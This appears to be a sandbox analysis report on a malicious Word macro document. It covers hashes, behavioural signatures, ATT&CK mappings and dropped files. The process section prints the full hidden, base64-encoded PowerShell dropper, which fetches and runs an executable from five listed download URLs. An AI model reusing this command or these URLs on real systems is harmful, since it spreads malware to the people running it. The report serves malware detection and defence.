487f4dd9bdbe94a9cf1a04a8fdec19f16f86864d05d06f0511544b3ff68c850c

General

Target

virusshare/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
Size

182KB
MD5

1ba8249d8503c0cf7bc125588c43bef9
SHA1

eb473c845c7474010ff35a3e8a169a9b6b9e5ebe
SHA256

a44031feb2a71980a0980377c8f7b6f3b5b9dfa0f708556dd420be323c7e1a38
SHA512

b5421ca474e8ccd30683b90a83e98c6ba74c8418201aaa923ba6c7805ef724b37dfabb74cfedccbb69e3fcf923635f64faa406f280057404f78957df3d840c8c
SSDEEP

3072:9NO2y/GdywFyktGDWLS0HZWD5w8K7Nk9rD7IBU9asiv8Oc7V:9NO2k4PF7tGiL3HJk9rD7b9asiv8dZ

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://diwafashions.com/wp-admin/mqau6/

exe.dropper

http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/

exe.dropper

http://dixartcontractors.com/cgi-bin/nnuv/

exe.dropper

http://diaspotv.info/wordpress/G/

exe.dropper

http://easyvisaoverseas.com/cgi-bin/v/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	4976	Powershell.exe	82

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	2764	Powershell.exe
8	2764	Powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2764	Powershell.exe

Deletes itself 1 IoCs

pid	Process
4596	WINWORD.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0000.tmp\:Zone.Identifier:$DATA	WINWORD.EXE
File created	C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0002.tmp\:Zone.Identifier:$DATA	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4596	WINWORD.EXE
4596	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2764	Powershell.exe
2764	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	Powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE
4596	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4596 wrote to memory of 3580	4596	WINWORD.EXE	84
PID 4596 wrote to memory of 3580	4596	WINWORD.EXE	84

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\virusshare\1\VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc" /o ""
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BA8E000A.wmf

Filesize
444B

MD5
f7b6fa2cd3c16a6365cdd28336ad14d8

SHA1
54059addb46193514bd20e22e89776f6c049d446

SHA256
21d6a87f16f389c631e56954c6dbb6aace2312f5c203112552fc614cb19dae9e

SHA512
8915e8a8090668eae8bddbcd808978850e5dec07dbabd08c987c654321ed63f89cf00cb61489e74c63161dc35d34a07cad8c570ca24a4d1044b9f2fcebea140d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwyz1k21.dxd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0000.tmp

Filesize
213KB

MD5
60a7c14c2ba1f2ae9ed40c3f16063004

SHA1
2ce11b6f3302bf9588b1c2d5b45845f4f5ffef51

SHA256
809271b752a41a9567425e0210bf2680ac0701978ae70e15382c65cdc081bb99

SHA512
680f372652aad488e9b192652901f007cac6221b20cf67ec94963320d3e039f27f3c257df80da2170bc7ea80fec91077d226f4ecab2e70e5ed08a620b722d508

Download Submit
C:\Users\Admin\AppData\Local\Temp\virusshare\1\~WRD0002.tmp

Filesize
213KB

MD5
cf507c54411e57c79d300820e536a1ea

SHA1
c8668a42a093e04df09959cd0a7f1426b0288d7d

SHA256
0d1f1fcaad7cf2d819a7ca45f53fefc6f65919d822f4765cd788b2f59e31f033

SHA512
48b043c55deb42d5f9074bb913b38e2af23c0f8bac192035bf8ded24db0f809958000213409517f25b377e754ae34ac0b4eeb04c084e0c2961821e7ce19c8bbf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
memory/2764-44-0x000001861F2A0000-0x000001861F2C2000-memory.dmp

Filesize
136KB

Download
memory/4596-19-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-5-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-10-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-9-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-8-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-11-0x00007FFCE1F90000-0x00007FFCE1FA0000-memory.dmp

Filesize
64KB

Download
memory/4596-12-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-13-0x00007FFCE1F90000-0x00007FFCE1FA0000-memory.dmp

Filesize
64KB

Download
memory/4596-15-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-14-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-18-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-20-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-1-0x00007FFD24B43000-0x00007FFD24B44000-memory.dmp

Filesize
4KB

Download
memory/4596-17-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-16-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-7-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-6-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-4-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-59-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-60-0x00007FFD24B43000-0x00007FFD24B44000-memory.dmp

Filesize
4KB

Download
memory/4596-61-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-64-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download
memory/4596-2-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-3-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-0-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-612-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-615-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-614-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-613-0x00007FFCE4B30000-0x00007FFCE4B40000-memory.dmp

Filesize
64KB

Download
memory/4596-616-0x00007FFD24AA0000-0x00007FFD24CA9000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads